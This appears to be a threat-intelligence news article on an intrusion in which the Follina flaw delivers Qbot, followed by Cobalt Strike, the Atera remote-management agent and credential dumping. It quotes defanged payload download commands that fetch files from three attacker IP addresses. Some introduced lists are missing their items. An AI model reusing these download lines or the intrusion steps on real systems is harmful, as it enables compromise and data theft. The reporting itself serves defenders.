- Atera Agent
- Cobalt Strike
Threat actors have exploited the CVE-2022-30190 (Follina vulnerability) in this intrusion and here they used a malicious Word document to embed the exploit code into it for gaining initial access.
According to the report, Inside the Temp directory of the users, the base64-encoded content that comes with the payload is used by threat actors to download Qbot DLL files. This activity was immediately followed by the execution of the Qbot DLL through the regsvr32.exe on the host.
There were a number of Windows utilities that were spawned by the injected process, including:-
The Qbot persistent mechanism was based on creating scheduled tasks. The injected Cobalt Strike process executes the following utilities:-
A tool called Atera Remote Management was installed on the domain controller in order to allow remote access. A port scan was performed across the entire network by the tool, which was executed.
By doing this, the threat actors will be able to access sensitive documents from a file share server through RDP, and this will also enable them to connect to it in the future and maintain persistence.
As part of the initial delivery of this intrusion, hijacked email threads were used in conjunction with TA570. There is a possibility that the code that is generated will be interpreted and executed by msdt.exe (Microsoft Support Diagnostic Tool) when a system becomes vulnerable to Follina.
The Folllina uses three different URLs to download the Qbot libraries, which makes it a very unique payload. The following are the three URLs that we have mentioned below:-
- http[:]//22.214.171.124/$(random)[:]dat -OutFile $pt.A
- http[:]//126.96.36.199/$(random)[:]dat -OutFile $pt1.A
- http[:]//188.8.131.52/$(random)[:]dat -OutFile $pt2.A
A new instance of the sdiagnhost.exe is spawned as soon as a MSDT payload is executed. The Follina payload was ultimately invoked by this process, and it was the end result of this process.
Process hollowing is a method used by QBot to streamline its processes. There was an attempt to inject malware into explorer.exe by starting it in a suspended state, and then using the suspended version as a target – in this case, 32-bit explorer.exe.
The following access rights correspond to the level of access that is commonly requested for credentials mining by the credential dumping tools like Mimikatz:-
- PROCESS_VM_READ (0x0010)
- PROCESS_QUERY_INFORMATION (0x0400)
- PROCESS_QUERY_LIMITED_INFORMATION (0x1000)
- PROCESS_ALL_ACCESS (0x1fffff)
For the purpose of extracting sensitive data from the compromised host, Qbot used several types of information-stealing modules. After that, the Atera RMM agent was installed and enabled on the domain controller by the threat actor during the attack.
Further, without relying on RDP, the threat actors gained access to the environment using the deployed remote admin tools.